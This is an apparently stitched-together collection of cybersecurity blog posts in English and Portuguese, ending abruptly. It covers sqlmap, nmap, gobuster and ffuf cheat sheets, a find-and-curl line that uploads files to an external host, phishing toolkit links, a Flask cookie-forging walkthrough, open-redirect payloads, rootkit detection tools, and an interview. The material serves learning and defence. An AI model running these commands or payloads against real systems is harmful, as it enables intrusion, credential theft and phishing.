SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f

SQLMap example

sqlmap -u meh.com–forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3 Automatic sqlmap scanning

sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php” Targeted sqlmap scanning

sqlmap -u “ meh.com/meh.php? “ –dbms=mysql –tech=U –random-agent –dump Scan URLs for federation + error based injection with MySQL backend and use random user agent + database dump

sqlmap -o -u “ meh.com/form/”-forms SQLMap inspection form for injection

sqlmap -o -u “ meh/vuln-form” –forms -D database-name -T users –dump SQLMap dump and cracked hash of table user on database name

Nmap insights combination

Slow scan all ports with nmap:
nmap — privileged -sV -sC -sS -p- -oN nmap <host>

To get more information about the services that are running on the ports, let’s run an nmap scan with the -A option.
nmap -A -sV -sC <host> -p80,135,139,445

TCP SYN Scan (-sS):
This scan type is used to determine if a port is open on the target host. It is considered stealthy because it does not complete the TCP handshake.

TCP Connect Scan (-sT):
This scan type attempts to establish a full TCP connection to the target port. It is less stealthy than the SYN scan but can be useful for identifying services running on the target port.

UDP Scan (-sU):
This scan type is used to discover open UDP ports on the target host. It is particularly useful for services that communicate over UDP.

TCP NULL Scan (-sN):
This scan type sends packets with the TCP flags set to NULL, which can help in identifying hosts that are up and running.

TCP FIN Scan (-sF):
This scan type sends packets with the TCP FIN flag set, which can be used to determine if a port is open on the target host.

Xmas Scan (-sX):
This scan type sends packets with the TCP FIN, PSH, and URG flags set, which can be used to identify hosts that are up and running.

TCP ACK Scan (-sA):
This scan type sends packets with the TCP ACK flag set, which can be used to determine if a port is open on the target host.

IP Protocol Scan (-sO):
This scan type is used to identify the IP protocols supported by the target host.

SCTP COOKIE ECHO Scan (-sZ):
This scan type is used to discover SCTP ports on the target host.

Idle Scan (-sI):
This scan type is used to perform a scan when the network is idle, reducing the chance of detection.

Additional Useful Commands
Service Version Detection:
Use nmap -sV
to detect the version of services running on open ports.

OS Detection:
Use nmap -O
to attempt to determine the operating system of the target host.

Script Scanning:
Use nmap — script=<script-name>
to run specific NSE (Nmap Scripting Engine) scripts for more detailed scanning.

Traceroute:
Use nmap — traceroute
to perform a traceroute to the target host.

Ping Sweep:
Use nmap -sn
to perform a ping sweep, which is useful for host discovery without port scanning.

Gobuster

Let’s search the directories with gobuster. In the parameters we specify the number of threads 128 (-t), URL (-u), dictionary (-w) and extensions we are interested in (-x).

gobuster dir -t 128 -k -u <host> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,sh,cgi

gobsuter dir -t 50 -k -u http/10.10.x.x:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s ‘200,301’ — no-error

Let’s search the subdomains with gobuster:
gobuster vhost -u <host> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -k

Ffuf cheat sheet

LFI Fuzzing
Basic LFI fuzzing with ../
ffuf -w /path/to/wordlist.txt -u http://target/file.php?file=../../FUZZ

Advanced LFI fuzzing with nullbyte (%00) termination
ffuf -w /path/to/wordlist.txt -u “http://target/file.php?file=../FUZZ%00"

Extension Fuzzing
Fuzzing file extensions with custom wordlist
ffuf -w /path/to/wordlist.txt -u http://target/file.FUZZ

Fuzzing multiple extensions at once
ffuf -w /path/to/extensions.txt -u http://target/file.FUZZ

Page Fuzzing
Fuzzing parameter values on a specific page
ffuf -w /path/to/wordlist.txt -u http://target/page.php?id=FUZZ

Advanced page fuzzing with cookies and headers
ffuf -w /path/to/wordlist.txt -u http://target/page.php -b “cookie1=value1; cookie2=value2” -H “Authorization: Bearer FUZZ”

General Tips:
-w : Specifies the wordlist file
-u : Specifies the target URL with FUZZ as the placeholder
-mc : Match only specified HTTP status codes (e.g., -mc 200,404)
-recursion : Enable directory recursion
-recursion-depth : Set recursion depth level
-H : Set custom header (e.g., Host for virtual host scanning)
-b : Set custom cookies for requests
%00 : Nullbyte termination for LFI fuzzing

Find command

Basic Examples:
Search for files or directories with the exact name “example.txt” in the current directory (and its subdirectories).
find . -name “example.txt”

Find all directories in the “/home” directory.
find /home -type d

Search for files owned by the user “john” in the “/data” directory.
find /data -user john

Find all files with the extension “.txt” in the current directory and download them using `curl`.
find . -type f -name “*.txt” -exec curl -O {} \;

Intermediate Examples:
Extract specific content from a webpage using `curl` and `sed`.
curl https://example.com/page.html | sed -n ‘s/<p>\(.*\)<\/p>/\1/p’

Find all directories in the “/home” directory and count the number of files in each using `find` and `wc`.
find /home -type d -exec sh -c ‘echo -n “{}: “; find “{}” -type f | wc -l’ \;

Find all files modified in the last 7 days and perform an HTTP POST request with their content using `find`, `curl`, and `xargs`.
find . -type f -mtime -7 -print0 | xargs -0 -I{} curl -X POST -d @{} https://api.example.com/upload

Search for files with the extension “.log” in the “/var/logs” directory, compress them, and store in a backup folder using `find`, `curl`, and `tar`.
find /var/logs -type f -name “*.log” -exec tar czvf /backup/logs_backup.tar.gz {} \;

Advanced Examples:
Find all files in the current directory larger than 10MB and delete them using `find` and `rm`.
find . -type f -size +10M -exec rm {} \;

10 Phishing Tools

Evilginx2:- https://github.com/kgretzky/evilginx2
SEToolkit:- https://github.com/trustedsec/social-engineer-toolkit
King-Phisher:- https://github.com/rsmusllp/king-phisher
Gophish:- https://getgophish.com/
Wifiphisher:-https://github.com/wifiphisher/wifiphisher
socialfish:-https://github.com/UndeadSec/SocialFish
black eye:-https://github.com/An0nUD4Y/blackeye
shellfish:-https://github.com/AbirHasan2005/ShellPhish
zphisher:-https://github.com/topics/zphisher
AdvPhishing:-https://github.com/Ignitetch/AdvPhishing

Cyber Security Links

http://carnal0wnage.blogspot.com/
http://www.mcgrewsecurity.com/
http://www.gnucitizen.org/blog/
http://www.darknet.org.uk/
http://spylogic.net/
http://taosecurity.blogspot.com/
http://www.room362.com/
http://blog.sipvicious.org/
http://blog.portswigger.net/
http://pentestmonkey.net/blog/
http://jeremiahgrossman.blogspot.com/
http://i8jesus.com/
http://blog.c22.cc/
http://www.skullsecurity.org/blog/
http://blog.metasploit.com/
http://www.darkoperator.com/
http://blog.skeptikal.org/
http://preachsecurity.blogspot.com/
http://www.tssci-security.com/
http://www.gdssecurity.com/l/b/
http://websec.wordpress.com/
http://bernardodamele.blogspot.com/
http://laramies.blogspot.com/
http://www.spylogic.net/
http://blog.andlabs.org/
http://xs-sniper.com/blog/
http://www.commonexploits.com/
http://www.sensepost.com/blog/
http://wepma.blogspot.com/
http://exploit.co.il/
http://securityreliks.wordpress.com/
http://www.madirish.net/index.html
http://sirdarckcat.blogspot.com/
http://reusablesec.blogspot.com/
http://myne-us.blogspot.com/
http://www.notsosecure.com/
http://blog.spiderlabs.com/
http://www.corelan.be/
http://www.digininja.org/
http://www.pauldotcom.com/
http://www.attackvector.org/
http://deviating.net/
http://www.alphaonelabs.com/
http://www.smashingpasswords.com/
http://wirewatcher.wordpress.com/
http://gynvael.coldwind.pl/
http://www.nullthreat.net/
http://www.question-defense.com/
http://archangelamael.blogspot.com/
http://memset.wordpress.com/
http://sickness.tor.hu/
http://punter-infosec.com/
http://www.securityninja.co.uk/
http://securityandrisk.blogspot.com/
http://esploit.blogspot.com/
http://www.pentestit.com/

Forums:

http://sla.ckers.org/forum/index.php
http://www.ethicalhacker.net/
http://www.backtrack-linux.org/forums/
http://www.elitehackers.info/forums/
http://www.hackthissite.org/forums/index.php
http://securityoverride.com/forum/index.php
http://www.iexploit.org/
http://bright-shadows.net/
http://www.governmentsecurity.org/forum/
http://forum.intern0t.net

Exploits and Advisories:

http://www.exploit-db.com/
http://www.cvedetails.com/
http://www.milw0rm.com/ (Down permanently)
http://www.packetstormsecurity.org/
http://www.securityforest.com/wiki/index.php/Main_Page
http://www.securityfocus.com/bid
http://nvd.nist.gov/
http://osvdb.org/
http://www.nullbyte.org.il/Index.html
http://secdocs.lonerunners.net/
http://www.phenoelit-us.org/whatSAP/index.html
http://secunia.com/
http://cve.mitre.org/

𝖳𝗁𝖺𝗇𝗄𝗌 𝖿𝗈𝗋 𝗌𝗍𝗈𝗉𝗉𝗂𝗇𝗀 𝖻𝗒, 𝖼𝗈𝗇𝗇𝖾𝖼𝗍 𝗐𝗂𝗍𝗁 𝗆𝖾 𝗈𝗇 𝗌𝗈𝖼𝗂𝖺𝗅 𝗆𝖾𝖽𝗂𝖺, 𝖺𝗇𝖽 𝗌𝖾𝖾 𝗒𝗈𝗎 𝗇𝖾𝗑𝗍 𝗍𝗂𝗆𝖾!

https://beacons.ai/morganbinbash

@morganbinbash | Linktree

@morganbinbash | Linktree

𝘋𝘦𝘴𝘤𝘳𝘪𝘤̧𝘢̃𝘰 𝘥𝘢 𝘝𝘶𝘭𝘯𝘦𝘳𝘢𝘣𝘪𝘭𝘪𝘥𝘢𝘥𝘦:

Quando todas as seguintes condições são atendidas, uma resposta contendo dados destinados a um cliente pode ser armazenada em cache e posteriormente enviada por um proxy a outros clientes.
Se o proxy também armazena os cabeçalhos Set-Cookie, ele pode enviar o cookie de sessão de um cliente para outros clientes.
A gravidade dessa vulnerabilidade depende do uso da sessão pela aplicação e do comportamento do proxy em relação aos cookies.
O risco está associado ao cumprimento de todas essas condições:

1- A aplicação deve estar hospedada atrás de um proxy de cache que não remova cookies nem ignore respostas com cookies.

2- A aplicação define session.permanent = True.

3- A aplicação não acessa ou modifica a sessão em nenhum momento durante uma solicitação.

4- SESSION_REFRESH_EACH_REQUEST está habilitado (o padrão).

5- A aplicação não define um cabeçalho Cache-Control para indicar que uma página é privada ou não deve ser armazenada em cache.

Essa vulnerabilidade ocorre porque versões vulneráveis do Flask só definem o cabeçalho Vary: Cookie quando a sessão é acessada ou modificada, não quando ela é atualizada (reenviada para atualizar a expiração) sem ser acessada ou modificada.

Versões Afetadas e Corrigidas:

Versões afetadas: >= 2.3.0, < 2.3.2 e < 2.2.5.
Versões corrigidas: 2.3.2 e 2.2.51.

1. Encontre a chave secreta
Utilizaremos uma máquina virtual para utilizar o sistema operacional Ubuntu.
O Ubuntu é ótimo porque o Python vem pré-instalado e possui pacotes que faltam no Windows.
Depois de abusar do Google, encontrei o flask-unsign, que é uma ferramenta que nos ajudará a descobrir a chave secreta.

Vamos instalar o flask-unsign.

$ pip3 install flask-unsign

Ok, vamos ver como funciona.

Vamos inserir um cookie “butter” (parte da lista de nomes de cookies).
Então você deverá ver uma página que diz. De qualquer forma, basta inspecionar a página e copiar o valor do cookie.

$ flask-unsign — unsign — cookie < cookie.txt — wordlist wordlist.txt

wordlist.txt

$ flask-unsign — unsign — cookie < cookie.txt

Olhei para o código e percebi que o cookie.txt continha um valor de cookie. Então decidi fazer meu próprio cookie.txt com um valor de cookie dentro:

O valor do cookie que escondi em cookie.txt é aquele acima, onde digitei ‘butter’.

Também criei um wordlist.txt com os nomes dos cookies encontrados em server.py (isso servirá como minha lista de palavras para forçar a chave secreta). Veja na seção de referências na parte inferior.

Certifique-se de estar na pasta correta que contém cookie.txt e wordlist.txt… então você pode inserir este comando.

$ flask-unsign --unsign --cookie < cookie.txt --wordlist wordlist.txt

Depois de 1 segundo agonizante, você leva um tapa com a chave secreta!! No meu caso, foi ‘butter’.

MANEIRA MAIS RÁPIDA QUE USEI PARA ENCONTRAR A CHAVE SECRETA

$ flask-unsign --unsign --server 'http://website:65344/' --wordlist wordlist.tx

GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder

Exemplo de saída noraj flask_session_cookie_manager:

python3 flask_session_cookie_manager3.py encode -s butter -t “{‘very_auth’:’admin’}”

Use a chave secreta para gerar nosso próprio cookie
Com a chave secreta, o resto será muito fácil. É hora de criar nosso próprio cookie de sessão!

Insira nosso cookie no site para substituir o valor do cookie
Copie e cole aquele bad boy no valor do cookie.
Recarregue a página para receber a sessão.

https://beacons.ai/morganbinbash

Estou entrevistando nosso caro “Mist”, com o objetivo de que conheçam um pouco mais dessa pessoa muito agradável e querida por muitas pessoas e comunidades da área de cibersegurança. Mist é uma referência de força de vontade e determinação, além de ser uma pessoa sempre pronta a colaborar com o próximo, seja com sua persona marcante como bom amigo, estudante e profissional. Afirmo e assumo toda a responsabilidade jurídica do conteúdo desta edição, pois tudo foi apresentado ao entrevistado mediante sua aprovação para publicação nesta plataforma. Com a aprovação do mesmo, apreciem e conheçam um pouco mais dessa figura muito querida.

Quem é MistRaven:

Bem, a origem do meu nick veio de estudos do autoconhecimento, mais especificamente do Xamanismo. O corvo é meu animal de poder, além de ser um símbolo de magia e mistério. O “Mist” veio da névoa, queria que fosse algo marcante, então decidi por “MIST”. Sou brasileiro, tenho 23 anos. Eu me colocaria na posição de entusiasta, mas ao mesmo tempo apaixonado. Penso como profissional e PCD (Pessoa com Deficiência) que a área de informática e, principalmente, cibersegurança devem ser acessíveis e inclusivas para todos, independentemente de barreiras físicas ou quaisquer outras.

O que despertou seu desejo de entrar no segmento de segurança digital?

O que despertou, acredito que, como para a maioria de nós amantes desse mundo de 0 e 1, é simplesmente buscar entender como tudo funciona. Lembro-me de ter conhecido vídeos muito antigos de um professor chamado Marco Aurélio Thompson e de ficar fascinado com as coisas que ele demonstrava, como o NMAP e como as portas funcionavam, como os exploits eram feitos, mas principalmente queria buscar respostas do porquê não se falava sobre isso na época. Lembro-me de ser criança e acompanhar os vídeos dele. Eu explorava muito softwares como Turkojan 4, bons tempos.

Eu acredito que sair da zona de conforto… Lembro-me de quando tinha 18 anos e queria aprender sobre Linux. Tinha medo de explorar algo novo, tinha medo do terminal. Eu lia muito sobre tudo que envolvia a parte de SEC, mas tinha sempre aquela curiosidade que me movia. Lembro de ver vídeos do John Hammond fazendo CTF e pensei comigo, se ele, dedicado como é, consegue, eu também consigo. Uma das minhas maiores realizações como pessoa foi ter auxiliado pessoas a descobrir que, assim como eu, gostavam da área de info. Sempre gostei de ajudar as pessoas nos primeiros passos e sempre gostei de unir as pessoas. Tive muito auxílio e apoio do meu mentor, Fabiano Duarte, que me aconselhou sempre a ter uma mente forte e evoluir passo a passo, curtindo a jornada. Sou imensamente grato a ele por me ensinar a ter resiliência, me mostrar o caminho das pedras no mundo Linux

Dicas do Mist:

fazer sempre uma busca extensa por boas referências de livros e documentações, organizar bem o seu ambiente a ponto de que se sinta confortável trabalhando com ele e sempre buscar se tornar o mais eficiente possível com as ferramentas que tens, sempre buscar mais.

Quais referências de livros que leu ou está lendo, se desejar falar sobre cursos que está fazendo.

Sobre livros que eu recomendo “Create Your Own Games with Python” e “Programação Shell Linux — 13ª Edição” de Julio Neves.

Fale um pouco dos objetivos e metas no campo de cibersegurança.

Minhas metas são tirar certificações LPI e, no futuro, talvez DCPT, e ter uma base sólida, principalmente ajudar mais pessoas a descobrir mais deste mundo ao qual me fascinou desde criança.

Cite sua filosofia.

Sigo como filosofia sempre se desafiar, estar sempre disposto a ajudar, sempre partilhar conhecimento e sempre manter um sorriso no rosto. Jamais permitir que pessoas que estão ao seu redor te digam que você não tem força para persistir ou que é louco por querer entrar no meio de SEC. Esteja sempre pronto para se desafiar, buscar novas alternativas, tentar sempre ir o mais profundo possível em uma área de conhecimento, seja ela Linux, quebra de hashes ou outros.

Qual experiência tornou-se marcante durante toda sua trajetória de estudos?

Ter conhecido meu mentor pessoalmente. Lembro-me desse dia como se fosse ontem. Conversamos muito e ele me ensinou comandos os quais explodiram minha cabeça e me deu

um caminho para seguir. Com relação a certificações e carreira, não só esse momento, como um outro muito especial: ter conhecido Kadu Zambelli pessoalmente. Além de ser uma pessoa que eu admiro, ele e o pessoal do Alquymia, essa comunidade que eu amo, me ajudaram a progredir e muito. Sou muito grato a todos os membros pelo carinho e amor.

Fale um pouco das comunidades que participa ou gostaria de indicar.

As comunidades que eu recomendo são Menina de Cibersegurança, Alquymia e Guia Anônima. Amo, graças a eles, fui literalmente salvo. Estava com sérios problemas, desanimado, mas eles me mostraram através do carinho e do acolhimento que recebi. Sou hoje uma pessoa mais feliz e de bem comigo mesmo por causa do apoio de vocês. Muita Gratidão. Amo vocês.

Deixe uma dica que possa colaborar com estudos de quem está começando a estudar sobre cibersegurança.

Uma dica é nunca deixar de buscar maneiras diferentes de aprender, conectar-se com pessoas que te ajudem a trilhar um caminho e, principalmente, não tenha medo. Tenha uma base sólida, foque em entender cada detalhe de um assunto, seja redes, sistemas operacionais ou vulnerabilidades.

Faça suas considerações.

Queria agradecer à minha família pelo apoio, meu mentor por sempre estar comigo e, principalmente, aos amigos que conheci nesta jornada por terem salvado a minha vida. Estudar segurança me mostrou que precisamos sempre proteger aquilo que mais importa para nós e as pessoas que conhecemos me ensinaram muito sobre o poder de uma amizade que pode te transformar. Amo cada um de vocês, meus amigos. Fico ainda mais feliz quando dizem que eu os ajudei de alguma forma, seja com ajudas técnicas ou não. Amo cada um de vocês. Contem comigo sempre.

- MistRaven — O Corvo da Névoa Binária

E lembrem-se: “Os corvos negros da alquimia guardam o segredo da transformação, voando alto em busca da essência que transmuta o ordinário em extraordinário”.

.mistraven

@ 355162002966052875

Discord - A New Way to Chat with Friends & Communities

https://beacons.ai/morganbinbash

https://beacons.ai/morganbinbash

𝐀𝐛𝐨𝐮𝐭 𝐛𝐞𝐡𝐚𝐯𝐢𝐨𝐫:

1- Unauthorized control:
Rootkits give the attacker almost complete control over the operating system, allowing them to perform actions without the user’s consent.

2- Concealment of malicious activities:
Rootkits can modify kernel functions to hide their presence and activities. This makes it difficult for users and administrators to detect the presence of the rootkit.

3- Deactivation of security software:
Rootkits can easily disable or damage your antivirus software, making your system even more vulnerable to other types of malware.

4- Exploitation of vulnerabilities:
Rootkits can exploit unpatched vulnerabilities to infiltrate a system.

5- System instability:
Rootkits, especially those that operate at the kernel level, can lead to system crashes and instability.

6- Permanence:
Once installed, rootkits can remain undetected for years.

7- It is important to note that removing a rootkit can be very difficult. If your kernel is compromised, you can’t trust anything it says about your files.

𝖬𝖺𝗇𝗎𝖺𝗅 𝖨𝗇𝗌𝗉𝖾𝖼𝗍𝗂𝗈𝗇:

Regularly review system logs (e.g., /var/log/messages, /var/log/syslog) for any suspicious activities or anomalies.
Monitor system performance and resource usage for unexpected behavior.

Detecting and removing rootkits on a Linux system can be challenging because rootkits are designed to hide themselves and their activities.
However, several tools and techniques can help identify and eliminate rootkits. Here are some commonly used tools:

𝟏) 𝐫𝐤𝐡𝐮𝐧𝐭𝐞𝐫 (𝐑𝐨𝐨𝐭𝐤𝐢𝐭 𝐇𝐮𝐧𝐭𝐞𝐫):

Rootkit Hunter is a popular open-source tool specifically designed for Unix-like systems.
It scans for rootkits, backdoors, and possible local exploits.
Installation:
(on Debian/Ubuntu)
sudo apt-get install rkhunter
or
(on CentOS/RHEL).
sudo yum install rkhunter
Usage:
sudo rkhunter — check

𝟐) 𝐜𝐡𝐤𝐫𝐨𝐨𝐭𝐤𝐢𝐭:

Similar to Rootkit Hunter, chkrootkit is a simple and effective tool for detecting rootkits on Linux systems.
Installation:
(on Debian/Ubuntu)
sudo apt-get install chkrootkit
or
(on CentOS/RHEL)
sudo yum install chkrootkit
Usage:
sudo chkrootkit

Chkrootkit and rkhunter from source:
Sometimes, it’s a good idea to download the latest versions directly from their official websites and compile them manually for the most up-to-date detection capabilities.

𝟑) 𝐋𝐲𝐧𝐢𝐬:

While not exclusively focused on rootkit detection, Lynis is a security auditing tool that can help identify vulnerabilities, including signs of compromise.
Installation:
Download from the official website:

Download page for Lynis

Usage:
sudo lynis audit system

𝟒) 𝐂𝐥𝐚𝐦𝐀𝐕:

ClamAV is an open-source antivirus engine that can be used to scan for malware, including rootkits.
Installation:
(on Debian/Ubuntu)
sudo apt-get install clamav
or
(on CentOS/RHEL)
sudo yum install clamav
Usage:
sudo clamscan -r /

Remember that no single tool can guarantee 100% detection of rootkits, and it’s advisable to use a combination of tools and manual inspection to enhance security.
Additionally, keeping your system and software up-to-date, practicing good security hygiene, and implementing proper access controls are crucial components of a comprehensive security strategy.

@morganbinbash | Linktree

https://beacons.ai/morganbinbash

Open redirection is a security vulnerability that occurs when a web application or website allows an attacker to redirect users to an arbitrary external URL.
This vulnerability is typically exploited by manipulating input parameters in URLs or other user-controllable data to redirect them to a malicious website.
The impact of open redirect vulnerabilities can vary, but attackers often use them for phishing attacks. By tricking users into clicking a seemingly legitimate link that redirects to a malicious website, attackers may attempt to steal sensitive information such as login credentials or financial details.
Here is a simple example to illustrate the concept:

Suponha que um site tenha uma página de login com um parâmetro de redirecionamento na URL, como este:

https://www.example.com/login?redirect=https://malicious-site.com

Se o aplicativo da web não validar e higienizar adequadamente o parâmetro “redirecionar”, um invasor poderá criar um link malicioso e induzir os usuários a clicar nele. Por exemplo:

https://www.example.com/login?redirect=https://malicious-site.com

Nesse caso, os usuários podem pensar que estão clicando em um link legítimo para a página de login do site original, mas na verdade estão sendo redirecionados para o site malicioso do invasor.

Para evitar vulnerabilidades de redirecionamento aberto, os desenvolvedores web devem validar e higienizar as entradas do usuário, especialmente aquelas usadas para redirecionamento. Além disso, é aconselhável usar uma abordagem de lista de permissões, permitindo apenas URLs específicos e confiáveis ​​para redirecionamento, em vez de depender de informações fornecidas pelo usuário. Auditorias e testes regulares de segurança podem ajudar a identificar e resolver possíveis vulnerabilidades em aplicativos da web.

Releases · WebGoat/WebGoat

Testing open redirects on a website is a crucial part of evaluating web security. Open redirects occur when a website allows external input to redirect users to different URLs and, if not properly validated, can be exploited by attackers for phishing or other malicious purposes.
Here’s a basic guide on how to test open redirects:

Permission:
make sure you have explicit permission to test the site for security vulnerabilities.
Unauthorized testing can lead to legal consequences.

Test environment:
Set up a controlled testing environment or use a website designed for hacking and ethical testing, such as OWASP’s WebGoat or DVWA (Damn Vulnerable Web Application).

Steps to test open redirects:
Identify user-controllable input:

Look for parameters or input fields where a URL or part of a URL can be manipulated.
Common parameters include redirect, url, next, etc.
Submit valid entry:

Initially, test with a valid URL to ensure the redirect functionality is working as expected.
Submit malicious input:

Inject a malicious URL or attempt to manipulate the input to redirect to an external website.

Example: https://example.com/redirect?redirectURL=http://malicious-site.com

Check for redirection:
Observe browser behavior. If it redirects to the provided URL, it may indicate an open redirect vulnerability.

Review the answer:
Use tools like browser developer tools or intercepting proxies (e.g. Burp Suite) to inspect HTTP responses.
Look for the Location header in the response, which indicates the redirect URL.

Test different HTTP methods:
Try different HTTP methods (GET, POST, etc.) to see if the open redirect vulnerability persists between methods.

Check whitelist/blacklist:
Some websites implement whitelists or blacklists for allowed redirect URLs. Test whether these mechanisms are in place and effective.

Test for URL Encoding:
Check whether the site performs URL encoding on user input. Try encoding characters (%20,%3C,%3E, etc.) to see if this affects the redirection.

Automated verification:
Use automated security testing tools such as OWASP ZAP or Burp Suite to check for open redirection vulnerabilities.

Check security controls:
Verify that the site employs security controls, such as using a safelist of whitelisted domains or validating the redirect URL format.

When testing for open redirects using Burp Suite, you can use various payloads to check if the application is vulnerable to this type of attack.
Open redirects typically involve manipulating URL parameters to redirect users to arbitrary external domains.
Here are some common payloads and techniques you can use in Burp Suite:

1- 𝑺𝒊𝒎𝒑𝒍𝒆 𝑼𝑹𝑳 𝒄𝒉𝒂𝒏𝒈𝒆𝒔:
https://www.example.com?redirect=https://malicious-site.com
https://www.example.com/redirect?url=https://malicious-site.com

2- 𝑼𝑹𝑳 𝒆𝒏𝒄𝒐𝒅𝒊𝒏𝒈:
%68%74%74%70%3a%2f%2f%6d%61%6c%69%63%69%6f%75%73%2d%73%69%74%65%2e%63%6f%6d (URL-encoded “https://malicious-site.com")

3- 𝑹𝒆𝒍𝒂𝒕𝒊𝒗𝒆 𝒑𝒂𝒕𝒉𝒔:
/redirect?url=https://malicious-site.com
../../redirect?url=https://malicious-site.com

4- 𝑫𝒐𝒖𝒃𝒍𝒆 𝑼𝑹𝑳 𝒆𝒏𝒄𝒐𝒅𝒊𝒏𝒈:
%252e%252e%252fredirect%253furl%253dhttps%253a%252f%252fmalicious-site.com

5- 𝑱𝒂𝒗𝒂𝑺𝒄𝒓𝒊𝒑𝒕 𝒑𝒂𝒚𝒍𝒐𝒂𝒅𝒔:
javascript:window.location=’https://malicious-site.com';
data:text/html,<script>window.location=’https://malicious-site.com';</script>

6- 𝑫𝒂𝒕𝒂 𝑼𝑹𝑰 𝒑𝒂𝒚𝒍𝒐𝒂𝒅𝒔:
data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb249J2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tJz48L3NjcmlwdD4=

Remember, it’s crucial to have proper authorization and permission before conducting any security testing, even if it’s in a controlled environment.
Unauthorized testing can lead to legal consequences.
Always follow ethical hacking guidelines and disclose any vulnerabilities responsibly.
If you’re testing a website you own or have permission to test, you may use these payloads with caution and ensure that you’re not causing harm to the target system.

@morganbinbash | Linktree

@morganbinbash | Linktree

Hᴇʟʟᴏ, ᴍʏ ᴅᴇᴄɪsɪᴏɴ ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴛʜɪs ᴀʀᴛɪᴄʟᴇ ɪs ᴛᴏ ǫᴜɪᴄᴋʟʏ sᴜʀᴠᴇʏ ᴛʜᴇ ᴄʏʙᴇʀ ᴀᴛᴛᴀᴄᴋs ᴛʜᴀᴛ ᴄᴀᴜsᴇᴅ sᴇʀɪᴏᴜs ᴅᴀᴍᴀɢᴇ ᴛᴏ Bʀᴀᴢɪʟɪᴀɴ ғɪɴᴀɴᴄɪᴀʟ ɪɴsᴛɪᴛᴜᴛɪᴏɴs, ᴡʜɪᴄʜ sᴏᴍᴇʜᴏᴡ ᴅɪᴅ ɴᴏᴛ sᴘᴇɴᴅ ᴍᴜᴄʜ ᴛɪᴍᴇ ʙʀᴏᴡsɪɴɢ ᴛʜᴇ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴍᴇᴅɪᴀ ᴏᴘᴇɴ ᴛᴏ ᴛʜᴇ ᴘᴜʙʟɪᴄ. ɪɴ ɢᴇɴᴇʀᴀʟ, ᴘᴇʀʜᴀᴘs ᴛᴏ ᴀᴠᴏɪᴅ ғᴜʀᴛʜᴇʀ ᴘᴏᴛᴇɴᴛɪᴀᴛɪɴɢ ᴛʜᴇ ᴄᴏɴsᴇǫᴜᴇɴᴄᴇs ᴏғ sᴜᴄʜ ɪɴᴄɪᴅᴇɴᴛs. Tʜᴇ ɪᴅᴇᴀ ɪs ᴛʜᴀᴛ ᴡᴇ ᴄᴀɴ ʀᴇғʟᴇᴄᴛ ᴏɴ ʜᴏᴡ ᴍᴜᴄʜ ᴛʜᴇ ᴅɪɢɪᴛᴀʟ sᴇᴄᴜʀɪᴛʏ ᴏғ sᴜᴄʜ ɪɴsᴛɪᴛᴜᴛɪᴏɴs ʜᴀs ʙᴇᴇɴ ɪᴍᴘʀᴏᴠᴇᴅ ɪɴ ʀᴇᴄᴇɴᴛ ʏᴇᴀʀs ɪɴ Bʀᴀᴢɪʟ, ᴏɴ ᴛʜᴇ ᴏᴛʜᴇʀ ʜᴀɴᴅ, ʜᴏᴡ ᴍᴜᴄʜ ᴡᴇ sᴛɪʟʟ ɴᴇᴇᴅ ᴛᴏ ᴇᴠᴏʟᴠᴇ, ɪɴ ᴛᴇʀᴍs ᴏғ ᴅɪɢɪᴛᴀʟ sᴇᴄᴜʀɪᴛʏ ғᴏʀ ᴜsᴇʀs, ʟɪɴᴋᴇᴅ ʙᴏᴅɪᴇs, sᴇʀᴠɪᴄᴇ ɪssᴜᴇs, ᴄᴏᴍᴍᴜɴɪᴄᴀᴛɪᴏɴ, ᴇᴛᴄ. .. Sᴏᴍᴇ ᴏᴛʜᴇʀ ᴀᴛᴛᴀᴄᴋs ɴᴏᴛ ʀᴇᴘᴏʀᴛᴇᴅ ʜᴇʀᴇ, ᴅᴏ ɴᴏᴛ ᴍᴀᴋᴇ ᴛʜᴇᴍ ᴀɴʏ ʟᴇss ɪᴍᴘᴏʀᴛᴀɴᴛ, ᴀɴᴅ ɪᴛ ɪs ɴᴏᴛ ɪᴍᴘᴏssɪʙʟᴇ ᴛᴏ ᴛᴀʟᴋ ᴀʙᴏᴜᴛ ᴛʜᴇᴍ ɪɴ ᴛʜᴇ ғᴜᴛᴜʀᴇ, ғᴏʟʟᴏᴡ ᴍᴇ ᴏɴ sᴏᴄɪᴀʟ ᴍᴇᴅɪᴀ, sʜᴀʀᴇ ʏᴏᴜʀ ɪᴅᴇᴀs, ɪᴛ ᴡɪʟʟ ʙᴇ ɢʀᴇᴀᴛ ᴛᴏ ᴋɴᴏᴡ ᴀʙᴏᴜᴛ ᴛʜᴇsᴇ. Tʜᴀɴᴋ ʏᴏᴜ ғᴏʀ ʀᴇᴀᴅɪɴɢ ᴀɴᴏᴛʜᴇʀ ᴏɴᴇ ᴏғ ᴍʏ ᴀʀᴛɪᴄʟᴇs, I ʙᴇʟɪᴇᴠᴇ I ᴄᴀɴ ᴄᴏɴᴛʀɪʙᴜᴛᴇ ɪɴ sᴏᴍᴇ ᴡᴀʏ, ᴜɴᴛɪʟ ɴᴇxᴛ ᴛɪᴍᴇ.

1. 𝑾𝒂𝒏𝒏𝒂𝑪𝒓𝒚 𝑹𝒂𝒏𝒔𝒐𝒎𝒘𝒂𝒓𝒆 (2017)

While not specific to Brazil, the WannaCry ransomware affected numerous countries, including Brazil. It targeted vulnerable Windows systems, encrypting files and demanding ransom payments in Bitcoin.
The WannaCry ransomware attack primarily affected systems worldwide in May 2017, targeting computers running Microsoft Windows operating systems. The attack exploited a vulnerability in the Windows operating system, for which Microsoft had already released a patch.

Now you know what ransomware is and its two main types. Here you will see some well-known examples that will help you identify the dangers presented by ransomware:

<Locky>
